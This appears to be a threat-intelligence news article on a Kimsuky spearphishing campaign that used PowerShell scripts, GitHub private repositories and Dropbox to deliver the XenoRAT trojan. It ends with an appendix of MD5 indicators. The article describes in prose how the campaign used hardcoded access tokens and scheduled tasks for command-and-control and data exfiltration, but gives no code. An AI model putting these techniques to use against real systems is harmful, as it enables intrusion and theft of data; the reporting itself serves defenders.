North Korean Hackers Exploit GitHub Infrastructure to Distribute Malware

A recent investigation has revealed a highly sophisticated spearphishing campaign in which North Korean hackers used GitHub, a prominent code-hosting platform, as a key part of their attack infrastructure.

The campaign, linked to the notorious DPRK-nexus threat group Kimsuky, demonstrates the evolving tactics of state-backed cybercriminals who increasingly leverage legitimate online services for malicious purposes.

Attack Strategy and Technical Details

The attacks, which began in March 2025, involved the use of specially crafted PowerShell scripts posted on social media platform X (formerly Twitter).

Upon execution, these scripts downloaded malware-laden files from both Dropbox and GitHub private repositories.

The malware is notable for its use of hardcoded GitHub Personal Access Tokens (PATs) embedded within the scripts, granting the attackers read and write access to private repositories.

This abuse allowed the hackers to not only distribute malware but also to exfiltrate sensitive information collected from victims’ systems directly into these private repositories.

Two GitHub accounts—“Dasi274” and “luckmask”—were identified as central to the campaign. Each account contained multiple private repositories with decoy documents and log files, each tailored to specific victims.

For example, repositories included decoy files impersonating South Korean law firms, with names such as “hole_311”, “hole_408”, and “star”.

The use of decoy files impersonating trusted entities is a hallmark of spearphishing, designed to increase the likelihood of a successful infection.

The malware payload, identified as a variant of the open-source XenoRAT, was downloaded from these repositories.

XenoRAT is a remote access trojan (RAT) known for its modular capabilities, which enable attackers to gain persistent access and control over infected systems, as well as exfiltrate sensitive data.

The malware used in this campaign was highly obfuscated and featured dynamically loaded strings, making analysis and detection more challenging for security researchers.

Detection and Exfiltration Techniques

A crucial aspect of the campaign was the use of scheduled tasks, which executed PowerShell scripts at regular intervals to upload system information and keylogs to the private GitHub repositories.

The malware created log files in specific formats, which were then uploaded using the hardcoded PATs.

This allowed the attackers to continuously monitor and control infected systems while also testing their malware and infrastructure using dedicated test IP addresses.

One of the technical insights gleaned from the investigation was the use of a shared test IP address, 80.71.157.55, across multiple log files.

This same IP had previously been associated with other campaigns attributed to Kimsuky, strengthening attribution.

Additionally, the use of identical build environments and unique GUIDs in the malware samples further corroborated the connection to the North Korean threat actor.

To identify the full scope of the campaign, researchers used string-based search queries on VirusTotal, uncovering additional malware samples that employed the same string encryption methods and command-and-control (C&C) server addresses.

The campaign also exploited Dropbox, using similar tactics to distribute malware via RTF files. However, the use of GitHub as a command and control (C&C) and exfiltration channel is a particularly notable development.

Security Implications

The exploitation of GitHub infrastructure by North Korean hackers marks a shift toward the abuse of legitimate web services for malicious purposes.

The attackers’ ability to continuously modify scripts hosted on private repositories, coupled with the use of scheduled tasks and persistent access, makes detection and remediation challenging.

Organizations and individuals are urged to remain vigilant against phishing emails, scan attachments before opening them, and monitor their GitHub accounts for suspicious activity.

As threat actors become increasingly sophisticated, proactive security measures and awareness are essential to defend against these advanced threats.

This incident underscores the importance of securing access tokens, monitoring for unauthorized repository access, and maintaining robust threat detection systems to combat the ever-evolving landscape of cyber threats.

Appendix A. IOCs

md5

• a56edfef94008c77abfb4e151df934d9
• 30d5f17d5e3f85be18220a7cab0b9fff
• 5e9a80d3d4f71ecd8bf8e579a5e2449c
• f692c1dd797f68c34744a377482c4ed4
• b77e4e9f5897f00dcbd08b2ee9bde7e8
• 74b1d5f857a4245aef8189ac4f409a99
• 6cbc007799b56682ac196e44d79e496d